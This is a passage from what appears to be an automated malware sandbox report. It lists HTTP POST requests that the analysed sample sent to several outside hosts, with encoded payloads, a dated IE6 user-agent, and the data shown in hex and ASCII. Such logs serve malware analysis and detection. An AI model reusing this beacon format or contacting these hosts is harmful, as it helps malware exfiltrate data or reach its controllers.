55 67 6c 32 33 7a 33 76 52 2b 69 41 41 66 70 2b 48 77 58 69 39 35 37 4d 45 61 7a 6e 49 44 61 77 58 43 74 61 76 32 69 35 30 58 62 50 78 4e 6f 75 6d 5a 39 77 55 51 2b 51 62 41 77 33 57 76 56 79 71 48 74 35 7a 48 55 6f 77 6f 43 56 54 66 54 6e 62 6a 4d 6d 46 6e 4b 6a 6d 36 6a 72 43 70 30 71 47 45 39 55 66 70 42 75 47 36 71 6a 44 6e 6f 49 4e 68 36 6f 44 43 75 68 71 76 68 2b 65 77 52 4f 59 77 78 2b 62 4e 34 48 6b 78 5a 58 70 4e 2f 42 32 6d 2f 48 4b 69 73 37 71 39 71 34 44 55 41 59 65 53 55 52 62 43 44 35 61 63 6e 6d 57 57 61 39 52 58 47 39 32 35 44 31 4f 49 46 64 50 51 63 4b 42 71 6a 4c 6b 54 63 32 41 79 45 6a 2b 68 69 4d 7a 66 49 64 76 48 50 6e 47 76 57 64 76 41 45 39 54 58 64 68 4d 36 4b 58 78 65 75 4d 36 73 66 63 52 73 2b 69 31 48 76 6a 6f 39 52 78 6f 44 51 36 73 41 50 2b 32 76 48 77 33 6c 78 6f 52 71 77 45 74 45 61 2f 63 51 49 66 58 56 2f 68 41 54 Data Ascii: Bs+0vt1Nuobx8EB8FPV/6Rb+oA+LgkvKYXw2qSy5Tv6QGaJo4aleXmS9BCJi1ByYth7QOCjmpFAsv/+80PIuioETH/E2efUcPKX4LirOiHA5Qc4quEsU2ZoRqvq1tGDGeM70nxFiMlKFgx5YMKvxTOTELYRMQgD/6+56GTlxLmZsMcvNO1gtNylNP64Mi4nay6grPZO6QF6oI8JE5dfc3FvHD7kEgVoSApjVix4DKwYWHl1g87SMFTcackjM7QCn5eTiG/DdsQtgjFGh/GtvD5RUB/7Sp+RJ1Msz1dKtP+WHe3Ugl23z3vR+iAAfp+HwXi957MEaznIDawXCtav2i50XbPxNoumZ9wUQ+QbAw3WvVyqHt5zHUowoCVTfTnbjMmFnKjm6jrCp0qGE9UfpBuG6qjDnoINh6oDCuhqvh+ewROYwx+bN4HkxZXpN/B2m/HKis7q9q4DUAYeSURbCD5acnmWWa9RXG925D1OIFdPQcKBqjLkTc2AyEj+hiMzfIdvHPnGvWdvAE9TXdhM6KXxeuM6sfcRs+i1Hvjo9RxoDQ6sAP+2vHw3lxoRqwEtEa/cQIfXV/hAT
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 44 74 33 74 43 62 30 65 72 49 59 45 53 54 44 75 64 4e 44 67 70 2f 5a 64 56 4c 37 72 56 42 50 6b 51 65 4f 49 62 6e 7a 66 53 2f 64 42 49 35 4b 42 4d 4e 57 67 73 4e 31 41 6d 58 4c 46 42 46 43 4b 64 57 6a 73 37 73 30 39 36 31 66 79 31 64 54 73 4f 51 2b 48 32 53 74 32 4e 4b 57 69 74 78 58 4c 5a 48 66 66 56 41 41 32 49 44 57 53 37 44 72 68 52 75 45 50 63 62 35 52 62 59 70 71 49 4d 4c 48 74 48 4f 4b 37 71 68 63 75 68 41 39 6e 4b 47 35 62 4b 41 61 77 54 57 6a 49 4f 35 4b 67 66 69 34 74 55 30 62 64 7a 52 74 72 53 51 44 66 4c 4d 2f 7a 76 70 51 75 79 58 72 7a 64 37 63 4d 4a 45 6a 48 72 34 56 52 45 4e 6a 78 49 73 69 6d 74 64 6b 72 63 75 50 46 4a 32 30 4d 41 78 51 36 6f 65 76 4f 35 77 66 4e 78 74 49 4e 75 6d 30 51 44 4e 63 44 35 6b 6f 39 58 55 74 33 78 72 69 2f 66 53 75 4c 42 66 4d 78 5a 64 4f 5a 57 37 63 30 52 6d 31 73 6b 67 44 4c 33 4c 4d 61 2f 39 30 71 6f 36 2b 79 50 66 2f 33 6b 55 7a 78 54 52 50 42 76 58 61 78 54 76 73 76 67 6c 66 37 6a 4a 4e 63 6a 46 37 75 6b 47 6c 42 6a 77 37 79 6c 54 39 74 2b 51 4c 58 49 79 45 6f 5a 64 48 55 65 4c 53 73 62 56 75 77 7a 69 56 54 73 30 6b 6b 6f 76 5a 4d 54 63 6c 6d 4b 72 48 76 7a 59 37 58 49 67 4f 38 74 47 4f 59 66 54 68 34 47 53 33 70 59 6b 6c 37 59 66 54 36 34 6c 68 44 61 6c 6b 53 53 45 77 73 73 78 46 4b 63 61 6e 44 6c 41 4a 72 31 65 76 62 71 36 35 5a 2f 39 6d 30 63 72 62 6a 49 33 68 54 37 4f 77 46 44 4f 33 62 6d 4d 77 54 44 35 71 49 52 6f 70 72 52 50 67 73 41 64 49 4e 38 46 77 57 39 61 53 65 69 44 38 6f 47 43 58 33 36 6d 2b 7a 6a 46 6d 32 4f 65 74 57 64 45 67 6a 77 56 34 4e 62 32 4b 77 71 38 34 4e 41 58 4c 49 71 51 45 45 4f 6d 6e 48 39 4a 77 35 61 52 65 62 6c 72 69 43 6c 35 39 62 6e 66 71 44 66 74 77 6a 78 4d 4b 53 38 78 7a 62 77 3d 3d Data Ascii: Dt3tCb0erIYESTDudNDgp/ZdVL7rVBPkQeOIbnzfS/dBI5KBMNWgsN1AmXLFBFCKdWjs7s0961fy1dTsOQ+H2St2NKWitxXLZHffVAA2IDWS7DrhRuEPcb5RbYpqIMLHtHOK7qhcuhA9nKG5bKAawTWjIO5Kgfi4tU0bdzRtrSQDfLM/zvpQuyXrzd7cMJEjHr4VRENjxIsimtdkrcuPFJ20MAxQ6oevO5wfNxtINum0QDNcD5ko9XUt3xri/fSuLBfMxZdOZW7c0Rm1skgDL3LMa/90qo6+yPf/3kUzxTRPBvXaxTvsvglf7jJNcjF7ukGlBjw7ylT9t+QLXIyEoZdHUeLSsbVuwziVTs0kkovZMTclmKrHvzY7XIgO8tGOYfTh4GS3pYkl7YfT64lhDalkSSEwssxFKcanDlAJr1evbq65Z/9m0crbjI3hT7OwFDO3bmMwTD5qIRoprRPgsAdIN8FwW9aSeiD8oGCX36m+zjFm2OetWdEgjwV4Nb2Kwq84NAXLIqQEEOmnH9Jw5aReblriCl59bnfqDftwjxMKS8xzbw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 38 79 5a 41 77 51 52 6a 75 6f 62 73 67 55 78 6d 48 35 4b 39 41 74 66 30 30 44 67 38 71 45 70 38 65 4b 44 49 47 6f 45 32 62 5a 4c 4a 49 7a 49 43 67 44 55 4f 61 38 4f 54 4c 47 45 4d 4d 6c 46 48 69 6a 77 4e 65 6d 79 67 75 4e 66 68 4c 36 6a 4c 55 77 74 5a 54 78 2f 30 36 30 51 4c 45 69 4a 56 6c 52 71 6f 6d 46 49 6b 33 31 34 31 4c 33 6a 2f 6b 32 63 5a 6d 53 37 79 57 73 41 42 6d 32 47 5a 6a 52 54 52 66 6a 54 53 59 45 32 50 59 62 51 32 73 78 54 76 58 57 44 46 5a 36 79 33 65 43 2f 44 68 49 76 6a 34 57 5a 56 53 70 63 71 78 57 51 6e 6f 37 77 55 76 38 4b 68 36 59 71 4e 56 69 65 30 31 41 30 44 35 76 72 54 2f 68 70 42 47 6a 6f 33 39 71 42 56 57 33 35 49 64 4b 42 49 53 37 46 4a 6e 36 6f 36 4c 65 36 66 69 6e 2b 30 62 67 36 4e 58 4c 54 4a 58 79 68 44 6a 46 74 75 46 4c 70 4a 6b 6a 67 35 37 74 72 54 6c 42 38 67 54 43 41 4c 48 51 4f 77 64 37 76 6f 54 47 35 73 49 68 41 36 6a 57 64 75 51 53 47 6e 37 76 4e 37 4c 45 76 62 4a 70 55 43 4b 33 77 55 59 76 36 58 65 46 6e 2f 69 6e 74 6d 6b 33 4d 73 71 43 71 71 46 66 67 53 63 55 44 52 50 4c 61 51 59 52 34 52 63 35 72 6c 63 4f 52 74 43 76 4e 51 2b 4b 74 53 49 61 43 2b 4f 30 42 6d 48 36 54 35 51 54 38 53 38 42 38 46 62 32 6f 69 75 61 6f 59 48 5a 4c 39 75 66 41 38 72 77 67 43 36 4d 39 70 6f 4e 7a 35 68 4e 42 72 7a 2f 42 6d 4d 44 38 7a 37 44 69 41 55 4a 43 47 4c 70 77 31 6d 4c 69 78 78 53 47 77 6f 34 61 4a 54 57 36 61 6b 38 42 73 38 76 4c 66 57 34 66 4a 63 59 6c 72 75 74 73 2b 61 35 73 48 4b 51 48 4b 74 77 76 67 47 2b 73 2b 4f 6e 67 6d 31 4e 49 67 6f 67 42 69 78 4d 4c 76 6c 47 68 32 69 69 71 31 54 6f 55 50 6f 30 46 30 34 59 35 39 68 67 56 51 46 51 4b 35 4e 6a 59 34 46 34 38 55 4e 79 31 39 6c 41 76 72 62 79 7a 44 32 53 69 76 41 36 4b 4f 38 67 2b 53 6f 73 6a 67 59 52 56 49 32 79 6a 59 46 39 33 71 65 4d 34 6d 49 4a 63 4f Data Ascii: 8yZAwQRjuobsgUxmH5K9Atf00Dg8qEp8eKDIGoE2bZLJIzICgDUOa8OTLGEMMlFHijwNemyguNfhL6jLUwtZTx/060QLEiJVlRqomFIk3141L3j/k2cZmS7yWsABm2GZjRTRfjTSYE2PYbQ2sxTvXWDFZ6y3eC/DhIvj4WZVSpcqxWQno7wUv8Kh6YqNVie01A0D5vrT/hpBGjo39qBVW35IdKBIS7FJn6o6Le6fin+0bg6NXLTJXyhDjFtuFLpJkjg57trTlB8gTCALHQOwd7voTG5sIhA6jWduQSGn7vN7LEvbJpUCK3wUYv6XeFn/intmk3MsqCqqFfgScUDRPLaQYR4Rc5rlcORtCvNQ+KtSIaC+O0BmH6T5QT8S8B8Fb2oiuaoYHZL9ufA8rwgC6M9poNz5hNBrz/BmMD8z7DiAUJCGLpw1mLixxSGwo4aJTW6ak8Bs8vLfW4fJcYlruts+a5sHKQHKtwvgG+s+Ongm1NIgogBixMLvlGh2iiq1ToUPo0F04Y59hgVQFQK5NjY4F48UNy19lAvrbyzD2SivA6KO8g+SosjgYRVI2yjYF93qeM4mIJcO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 58 38 66 2b 6b 30 4b 4c 79 59 61 34 4b 67 54 77 4e 56 47 5a 2b 38 58 4e 32 42 52 53 38 46 33 34 6c 6d 58 37 41 2f 7a 38 2b 56 50 47 42 71 52 52 49 68 39 38 41 42 77 4c 48 2f 78 58 39 56 78 57 6a 78 4e 69 37 59 32 55 45 4c 51 69 72 64 49 42 72 48 56 31 57 30 50 74 77 32 33 32 51 61 36 4d 4f 4c 36 30 31 55 54 6c 41 77 61 77 4c 53 58 52 72 73 34 75 56 71 6a 52 67 38 67 4b 77 77 35 48 5a 48 72 78 55 6a 57 6a 51 71 63 61 56 69 71 71 38 4b 51 42 2b 4d 4c 49 56 6a 46 42 79 69 2b 42 34 64 65 65 49 61 6a 51 41 4e 6f 43 38 52 38 31 36 36 4d 49 2b 32 43 47 75 51 30 59 64 2b 6f 73 6d 61 4f 45 6d 56 51 6d 6f 46 55 31 4d 6c 6c 30 4a 44 4a 78 77 69 76 68 63 44 57 72 66 51 69 6f 2b 35 4c 6f 39 6f 49 78 76 51 4e 79 50 44 4d 4c 2b 70 6c 73 69 55 6e 55 2b 37 49 37 53 2b 61 5a 6c 4c 50 77 44 2f 30 53 36 69 55 2f 5a 62 36 32 61 72 47 38 47 6f 50 31 6b 46 32 32 53 59 59 69 4f 4a 43 50 65 73 46 44 71 6f 72 41 6b 48 50 38 68 69 6e 64 6f 43 68 72 48 67 70 46 55 78 38 50 50 2f 36 59 65 6b 71 31 53 71 47 54 63 53 65 43 37 4d 49 7a 61 35 65 4c 53 61 6d 76 41 4e 72 71 53 2f 71 61 4a 51 58 73 55 66 39 62 71 57 6f 4a 54 39 4b 6e 49 33 46 70 63 56 64 69 62 73 76 77 57 51 2f 4c 4a 71 6d 43 49 77 58 69 74 44 69 35 31 6d 58 77 33 42 55 4a 2b 78 69 76 50 4d 58 6a 77 44 2b 39 56 4f 4b 76 6e 75 67 6d 62 38 2f 77 48 59 43 7a 50 32 56 6f 42 46 42 4b 79 55 66 75 32 38 57 68 51 71 53 4f 32 70 61 57 43 58 6d 4a 42 69 2b 70 4a 6c 51 45 70 52 56 55 51 6a 53 4e 45 53 6d 48 57 72 2f 64 4c 35 73 73 74 4e 37 2b 47 69 64 36 2f 34 37 78 46 42 65 68 57 4a 7a 37 61 74 49 35 37 4c 55 65 73 50 5a 2b 51 38 30 51 32 7a 58 69 52 73 39 47 59 49 61 67 45 51 3d 3d Data Ascii: X8f+k0KLyYa4KgTwNVGZ+8XN2BRS8F34lmX7A/z8+VPGBqRRIh98ABwLH/xX9VxWjxNi7Y2UELQirdIBrHV1W0Ptw232Qa6MOL601UTlAwawLSXRrs4uVqjRg8gKww5HZHrxUjWjQqcaViqq8KQB+MLIVjFByi+B4deeIajQANoC8R8166MI+2CGuQ0Yd+osmaOEmVQmoFU1Mll0JDJxwivhcDWrfQio+5Lo9oIxvQNyPDML+plsiUnU+7I7S+aZlLPwD/0S6iU/Zb62arG8GoP1kF22SYYiOJCPesFDqorAkHP8hindoChrHgpFUx8PP/6Yekq1SqGTcSeC7MIza5eLSamvANrqS/qaJQXsUf9bqWoJT9KnI3FpcVdibsvwWQ/LJqmCIwXitDi51mXw3BUJ+xivPMXjwD+9VOKvnugmb8/wHYCzP2VoBFBKyUfu28WhQqSO2paWCXmJBi+pJlQEpRVUQjSNESmHWr/dL5sstN7+Gid6/47xFBehWJz7atI57LUesPZ+Q80Q2zXiRs9GYIagEQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 58 38 66 2b 6b 30 4b 4c 79 59 61 34 4b 67 54 77 4e 56 47 5a 2b 38 58 4e 32 42 52 53 38 46 33 34 6c 6d 58 37 41 2f 7a 38 2b 56 50 47 42 71 52 52 49 68 39 38 41 42 77 4c 48 2f 78 58 39 56 78 57 6a 78 4e 69 37 59 32 55 45 4c 51 69 72 64 49 42 72 48 56 31 57 30 50 74 77 32 33 32 51 61 36 4d 4f 4c 36 30 31 55 54 6c 41 77 61 77 4c 53 58 52 72 73 34 75 56 71 6a 52 67 38 67 4b 77 77 35 48 5a 48 72 78 55 6a 57 6a 51 71 63 61 56 69 71 71 38 4b 51 42 2b 4d 4c 49 56 6a 46 42 79 69 2b 42 34 64 65 65 49 61 6a 51 41 4e 6f 43 38 52 38 31 36 36 4d 49 2b 32 43 47 75 51 30 59 64 2b 6f 73 6d 61 4f 45 6d 56 51 6d 6f 46 55 31 4d 6c 6c 30 4a 44 4a 78 77 69 76 68 63 44 57 72 66 51 69 6f 2b 35 4c 6f 39 6f 49 78 76 51 4e 79 50 44 4d 4c 2b 70 6c 73 69 55 6e 55 2b 37 49 37 53 2b 61 5a 6c 4c 50 77 44 2f 30 53 36 69 55 2f 5a 62 36 32 61 72 47 38 47 6f 50 31 6b 46 32 32 53 59 59 69 4f 4a 43 50 65 73 46 44 71 6f 72 41 6b 48 50 38 68 69 6e 64 6f 43 68 72 48 67 70 46 55 78 38 50 50 2f 36 59 65 6b 71 31 53 71 47 54 63 53 65 43 37 4d 49 7a 61 35 65 4c 53 61 6d 76 41 4e 72 71 53 2f 71 61 4a 51 58 73 55 66 39 62 71 57 6f 4a 54 39 4b 6e 49 33 46 70 63 56 64 69 62 73 76 77 57 51 2f 4c 4a 71 6d 43 49 77 58 69 74 44 69 35 31 6d 58 77 33 42 55 4a 2b 78 69 76 50 4d 58 6a 77 44 2b 39 56 4f 4b 76 6e 75 67 6d 62 38 2f 77 48 59 43 7a 50 32 56 6f 42 46 42 4b 79 55 66 75 32 38 57 68 51 71 53 4f 32 70 61 57 43 58 6d 4a 42 69 2b 70 4a 6c 51 45 70 52 56 55 51 6a 53 4e 45 53 6d 48 57 72 2f 64 4c 35 73 73 74 4e 37 2b 47 69 64 36 2f 34 37 78 46 42 65 68 57 4a 7a 37 61 74 49 35 37 4c 55 65 73 50 5a 2b 51 38 30 51 32 7a 58 69 52 73 39 47 59 49 61 67 45 51 3d 3d Data Ascii: X8f+k0KLyYa4KgTwNVGZ+8XN2BRS8F34lmX7A/z8+VPGBqRRIh98ABwLH/xX9VxWjxNi7Y2UELQirdIBrHV1W0Ptw232Qa6MOL601UTlAwawLSXRrs4uVqjRg8gKww5HZHrxUjWjQqcaViqq8KQB+MLIVjFByi+B4deeIajQANoC8R8166MI+2CGuQ0Yd+osmaOEmVQmoFU1Mll0JDJxwivhcDWrfQio+5Lo9oIxvQNyPDML+plsiUnU+7I7S+aZlLPwD/0S6iU/Zb62arG8GoP1kF22SYYiOJCPesFDqorAkHP8hindoChrHgpFUx8PP/6Yekq1SqGTcSeC7MIza5eLSamvANrqS/qaJQXsUf9bqWoJT9KnI3FpcVdibsvwWQ/LJqmCIwXitDi51mXw3BUJ+xivPMXjwD+9VOKvnugmb8/wHYCzP2VoBFBKyUfu28WhQqSO2paWCXmJBi+pJlQEpRVUQjSNESmHWr/dL5sstN7+Gid6/47xFBehWJz7atI57LUesPZ+Q80Q2zXiRs9GYIagEQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.synetik.netCache-Control: no-cacheData Raw: 31 2b 35 57 76 47 2b 4b 77 6f 59 5a 68 6f 66 57 6a 6a 56 50 48 48 68 79 78 57 69 46 74 78 59 31 45 30 47 4b 33 31 69 50 6a 6f 77 42 41 46 6d 53 63 77 35 33 65 77 47 67 32 58 69 77 4c 34 66 64 73 46 57 38 67 58 46 57 69 50 2f 4e 45 72 43 6a 4c 4b 6d 70 50 34 52 43 62 50 6c 48 53 51 4e 56 7a 54 4c 4e 5a 68 78 45 75 6f 49 31 2b 70 72 69 39 58 33 55 6b 65 52 50 4d 4d 37 43 4f 63 55 63 32 79 63 6b 4e 75 56 51 43 39 37 56 6a 4b 2f 72 53 52 4f 78 53 49 59 2f 31 32 39 72 4e 48 74 52 76 74 46 44 30 73 5a 62 61 5a 4f 77 42 48 30 65 6b 67 42 62 69 69 6a 72 43 32 6e 35 76 54 48 31 2f 76 73 39 55 67 6e 63 32 49 43 44 76 4d 77 30 58 4a 4e 2b 37 31 76 6b 4b 4e 43 4c 6e 4d 36 6d 62 61 56 31 7a 64 32 50 57 79 50 4b 2f 6a 4a 6c 53 6d 45 34 4a 75 64 75 68 2b 4a 76 6f 38 69 4d 2f 51 63 46 48 59 49 4a 66 4d 75 37 72 2f 6a 55 6c 7a 32 79 34 52 4a 74 54 52 75 4a 69 62 30 41 61 65 43 38 68 61 43 75 50 77 51 36 4d 52 70 75 30 6a 79 43 7a 49 62 50 78 42 53 50 68 6d 75 45 68 62 6d 76 55 39 45 79 4c 70 70 68 38 73 75 52 67 47 51 58 4e 51 34 6c 52 73 49 39 2f 58 49 4f 31 42 41 65 73 34 34 54 32 50 45 37 64 4e 62 58 57 6d 35 4a 54 4f 4d 2f 69 51 31 6c 38 46 66 67 46 6b 74 32 5a 6c 50 38 5a 38 69 47 4e 45 49 56 56 33 57 47 66 65 47 58 72 2f 6d 4d 33 74 4e 6e 47 6a 42 30 69 77 35 70 67 68 34 76 48 59 66 55 58 2b 49 30 41 4b 33 39 57 79 6c 44 6b 79 49 2f 57 68 39 44 55 6c 37 50 6b 56 4f 73 52 5a 67 71 74 75 50 6a 6b 50 4a 69 51 68 38 54 44 46 5a 6a 58 70 62 77 34 68 4b 42 72 33 66 2f 59 64 79 2b 70 57 6a 33 44 52 71 36 73 70 4e 75 52 48 73 58 76 6f 53 61 77 30 67 6c 66 72 77 52 31 70 58 74 46 63 76 66 4d 43 43 53 38 31 71 6d Data Ascii: 1+5WvG+KwoYZhofWjjVPHHhyxWiFtxY1E0GK31iPjowBAFmScw53ewGg2XiwL4fdsFW8gXFWiP/NErCjLKmpP4RCbPlHSQNVzTLNZhxEuoI1+pri9X3UkeRPMM7COcUc2yckNuVQC97VjK/rSROxSIY/129rNHtRvtFD0sZbaZOwBH0ekgBbiijrC2n5vTH1/vs9Ugnc2ICDvMw0XJN+71vkKNCLnM6mbaV1zd2PWyPK/jJlSmE4Juduh+Jvo8iM/QcFHYIJfMu7r/jUlz2y4RJtTRuJib0AaeC8haCuPwQ6MRpu0jyCzIbPxBSPhmuEhbmvU9EyLpph8suRgGQXNQ4lRsI9/XIO1BAes44T2PE7dNbXWm5JTOM/iQ1l8FfgFkt2ZlP8Z8iGNEIVV3WGfeGXr/mM3tNnGjB0iw5pgh4vHYfUX+I0AK39WylDkyI/Wh9DUl7PkVOsRZgqtuPjkPJiQh8TDFZjXpbw4hKBr3f/Ydy+pWj3DRq6spNuRHsXvoSaw0glfrwR1pXtFcvfMCCS81qm
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 59 47 53 71 6c 53 53 5a 79 59 62 30 65 4c 65 4f 76 78 49 30 58 50 63 7a 54 33 48 63 36 47 4a 73 6d 43 68 63 6b 6b 31 63 62 34 70 5a 41 37 49 4d 2f 62 6a 59 32 4d 35 4f 56 67 48 35 50 6a 46 34 31 4f 36 6d 45 52 51 59 57 55 72 4a 64 35 67 6d 42 50 34 4f 71 5a 76 75 68 69 6c 48 47 2f 4c 64 41 4e 65 76 61 6d 64 44 35 78 75 6d 79 58 52 66 6a 62 6f 4b 32 4c 71 68 35 6f 68 33 73 47 43 46 7a 33 50 58 69 41 55 57 4f 49 75 64 6c 6a 75 72 75 4c 7a 30 37 42 6f 49 56 43 46 6f 55 30 78 38 69 6f 47 46 75 7a 4d 4e 56 73 43 70 39 2f 65 47 65 77 5a 71 4c 35 36 4e 77 6a 37 46 4b 6d 4f 36 37 64 30 77 32 47 68 57 31 35 4d 66 5a 6a 75 73 4b 6b 74 56 66 4c 4c 4e 4c 2b 68 36 32 59 65 67 38 36 6f 69 77 57 61 48 54 71 58 34 38 37 70 39 62 44 34 52 4c 53 34 73 76 56 44 72 66 5a 74 65 61 52 44 51 73 37 59 7a 48 37 6e 58 44 58 5a 36 69 59 4b 59 78 4b 6f 66 62 31 61 32 32 4c 6c 4b 57 59 4e 68 72 41 46 31 42 4b 62 54 61 74 7a 50 62 70 4d 68 6f 62 47 2b 57 70 56 52 78 31 32 56 68 46 76 42 61 41 54 38 65 33 77 4b 34 43 79 35 31 4b 30 59 31 6c 61 4b 4a 46 72 35 39 78 48 7a 33 46 4b 74 42 43 72 33 36 51 78 59 59 48 70 35 58 57 55 6f 59 4f 48 6c 4e 57 71 62 36 2b 4d 68 30 4d 44 4f 6e 58 7a 62 50 42 53 70 33 41 7a 51 44 7a 37 73 76 6a 33 48 53 7a 62 6e 49 36 67 30 4d 68 4e 33 49 43 68 78 49 58 6f 65 41 4c 5a 6a 4d 62 62 36 46 63 2f 55 56 33 2f 6c 50 30 6e 72 61 2b 5a 54 4b 73 2f 76 55 71 49 75 7a 67 4f 61 79 61 32 75 4d 39 63 71 56 4c 47 49 49 32 69 76 39 41 49 54 31 61 75 6f 51 58 5a 49 30 72 69 56 73 6b 37 34 72 4d 36 6d 4a 6a 37 4d 47 55 32 46 6e 51 7a 4f 61 39 71 44 51 64 4d 6c 2f 32 57 37 34 52 4c 61 37 4b 32 2b 48 39 50 5a 4b 42 72 39 67 78 62 42 4a 49 77 31 6e 78 6d 70 6c 7a 32 38 48 76 6d 44 78 50 65 61 51 43 2f 52 2b 2b 30 74 49 4c 32 32 33 63 72 5a 2b 67 41 3d Data Ascii: YGSqlSSZyYb0eLeOvxI0XPczT3Hc6GJsmChckk1cb4pZA7IM/bjY2M5OVgH5PjF41O6mERQYWUrJd5gmBP4OqZvuhilHG/LdANevamdD5xumyXRfjboK2Lqh5oh3sGCFz3PXiAUWOIudljuruLz07BoIVCFoU0x8ioGFuzMNVsCp9/eGewZqL56Nwj7FKmO67d0w2GhW15MfZjusKktVfLLNL+h62Yeg86oiwWaHTqX487p9bD4RLS4svVDrfZteaRDQs7YzH7nXDXZ6iYKYxKofb1a22LlKWYNhrAF1BKbTatzPbpMhobG+WpVRx12VhFvBaAT8e3wK4Cy51K0Y1laKJFr59xHz3FKtBCr36QxYYHp5XWUoYOHlNWqb6+Mh0MDOnXzbPBSp3AzQDz7svj3HSzbnI6g0MhN3IChxIXoeALZjMbb6Fc/UV3/lP0nra+ZTKs/vUqIuzgOaya2uM9cqVLGII2iv9AIT1auoQXZI0riVsk74rM6mJj7MGU2FnQzOa9qDQdMl/2W74RLa7K2+H9PZKBr9gxbBJIw1nxmplz28HvmDxPeaQC/R++0tIL223crZ+gA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 77 71 47 44 42 6f 61 54 31 59 62 79 7a 65 52 74 6f 64 55 6b 6c 71 6d 32 6f 6c 72 6d 5a 78 56 50 47 6d 68 6c 4d 6d 36 4c 72 67 53 5a 47 54 4f 43 41 46 64 37 4d 58 30 33 52 79 48 76 53 51 6d 5a 59 72 69 6d 4a 47 77 43 59 55 31 48 48 39 78 68 57 50 38 73 62 33 34 51 45 57 66 47 4f 33 53 74 55 6c 32 71 58 79 66 33 58 63 62 2b 58 62 79 4e 6a 37 43 6a 4e 6d 56 7a 75 67 63 37 7a 79 74 35 59 45 52 30 67 4f 32 34 37 39 43 38 42 56 4c 43 4e 48 53 53 79 4c 6f 65 34 59 62 33 34 67 74 59 50 4f 63 4b 63 6b 78 38 65 49 4a 33 74 31 46 67 41 65 44 6a 56 4a 79 4d 48 39 6c 38 53 51 72 47 6c 30 73 42 4f 30 37 77 70 7a 61 73 61 52 4d 6a 6b 65 59 63 4a 45 4f 4a 76 51 76 49 37 50 77 72 7a 64 34 36 50 63 67 31 37 36 67 6e 54 73 33 54 38 4d 39 4c 69 7a 4b 6f 5a 64 48 54 70 70 6f 30 2f 75 62 72 70 48 32 63 57 68 5a 74 74 6c 62 71 73 34 50 31 51 51 48 4a 65 72 64 46 6a 6f 57 2f 66 70 79 72 74 73 32 7a 5a 54 76 37 78 34 2b 4f 4b 66 43 2f 49 79 6f 64 6b 34 6d 33 57 52 4c 59 70 57 57 56 75 36 78 44 2f 30 67 49 63 63 42 6c 67 76 36 5a 61 4a 50 66 63 2f 36 51 61 50 50 7a 62 66 74 59 73 73 45 41 59 4c 42 71 36 53 79 30 2f 73 6a 4b 56 51 6e 71 64 33 35 6f 4f 65 4b 57 5a 70 47 75 66 5a 62 50 4f 78 59 2b 43 38 79 33 79 48 56 48 55 31 48 33 73 74 78 50 78 2b 52 63 30 55 78 6d 2b 51 45 69 67 77 42 50 6a 48 49 4e 71 4b 4c 52 59 4e 69 54 4e 74 31 52 66 59 54 76 45 4d 58 4b 4a 72 68 44 34 50 54 7a 64 65 31 43 39 55 56 2b 2b 6d 74 76 68 6a 56 69 66 4a 55 74 37 35 69 43 63 42 72 45 66 4f 6d 41 34 53 42 6c 46 62 72 6f 54 39 75 46 47 39 65 4f 45 48 30 58 67 71 37 4f 72 38 5a 59 37 44 74 51 57 41 70 45 7a 61 67 4e 32 6e 54 6b 35 74 6c 6a 68 77 38 42 33 57 59 33 52 6d 44 30 4b 6d 47 4a 50 53 7a 75 7a 4f 5a 55 4b 62 66 58 52 35 6a 4b 74 37 7a 69 59 6d 38 66 49 46 63 3d Data Ascii: wqGDBoaT1YbyzeRtodUklqm2olrmZxVPGmhlMm6LrgSZGTOCAFd7MX03RyHvSQmZYrimJGwCYU1HH9xhWP8sb34QEWfGO3StUl2qXyf3Xcb+XbyNj7CjNmVzugc7zyt5YER0gO2479C8BVLCNHSSyLoe4Yb34gtYPOcKckx8eIJ3t1FgAeDjVJyMH9l8SQrGl0sBO07wpzasaRMjkeYcJEOJvQvI7Pwrzd46Pcg176gnTs3T8M9LizKoZdHTppo0/ubrpH2cWhZttlbqs4P1QQHJerdFjoW/fpyrts2zZTv7x4+OKfC/Iyodk4m3WRLYpWWVu6xD/0gIccBlgv6ZaJPfc/6QaPPzbftYssEAYLBq6Sy0/sjKVQnqd35oOeKWZpGufZbPOxY+C8y3yHVHU1H3stxPx+Rc0Uxm+QEigwBPjHINqKLRYNiTNt1RfYTvEMXKJrhD4PTzde1C9UV++mtvhjVifJUt75iCcBrEfOmA4SBlFbroT9uFG9eOEH0Xgq7Or8ZY7DtQWApEzagN2nTk5tljhw8B3WY3RmD0KmGJPSzuzOZUKbfXR5jKt7ziYm8fIFc=
